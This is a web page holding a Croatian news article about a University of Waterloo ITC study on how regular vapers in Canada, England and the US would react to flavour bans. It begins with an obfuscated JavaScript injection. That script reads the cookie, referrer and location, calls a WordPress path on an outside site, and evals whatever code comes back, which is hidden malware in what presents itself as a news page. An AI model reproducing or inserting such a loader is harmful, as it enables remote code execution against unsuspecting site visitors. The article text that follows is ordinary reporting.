;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Zabrana aromatiziranih e-tekućina vraća korisnike e-cigareta pušenju

U skladu s prethodnim istraživanjima, nedavna studija objavljena u časopisu Addictive Behaviors, pokazala je da bi se velik broj vapera vratio pušenju ako bi se zabranili aromatizirani proizvodi za vaping.

Pod naslovom “Reakcije na potencijalna ograničenja okusa proizvoda za vaping među redovnim vaperima koji koriste neduhanske arome: nalazi iz ITC istraživanja o pušenju i vapingu 2020. u Kanadi, Engleskoj i Sjedinjenim Državama”, trenutnu studiju provela je Međunarodna evaluacija politike kontrole duhana na Sveučilištu Waterloo.

Istraživački tim je istražio hoće li obični vaperi iz Kanade, Engleske i SAD-a koji koriste samo aromatizirane e-cigarete biti za ili protiv zabrane okusa i kako će vjerojatno odgovoriti na takvu politiku.

“Naša studija pomaže popuniti praznine u dokazima o mogućem utjecaju zabrane okusa e-cigareta, nakon drugih studija koje su predvidjele kako pušači reagiraju na politike kontrole duhana kao što su povećanje poreza i zabrana mentola”, rekao je koautor studije, prof. Geoffrey Fong.

82% od 851 sudionika protivi se zabrani okusa

Prikupljeni podaci pokazuju da se 82% od 851 sudionika (od kojih su svi bili redoviti vaperi) protivi zabrani aromatiziranih vaping proizvoda, 13% je za, a 5% nije sigurno. Na pitanje kako bi reagirali na zabranu 57% je odgovorilo da će nastaviti s vapingom. Polovica njih je rekla da će se prebaciti na bilo koju dostupnu legalnu aromu, a druga polovica je rekla da će pronaći način da dobiju željeni okus nakon zabrane.

Štoviše, otprilike jedan od pet vapera rekao je da bi prestao pariti i umjesto toga počeo pušiti, a 13% ih je izjavilo da ne zna što bi. “Naša otkrića ukazuju na mogućnost da zabrana aromatiziranih proizvoda za vaping može odvratiti neke odrasle pušače od parenja, s mogućnošću da se vrate pušenju cigareta koje su očito puno štetnije od vaping proizvoda s obzirom na to da znamo da je barem polovica redovitih pušača umire od bolesti uzrokovane ili povezane s pušenjem”, rekla je glavna autorica studije i ITC asistentica u istraživanju Shannon Gravely.

Choose your Reaction!
Leave a Comment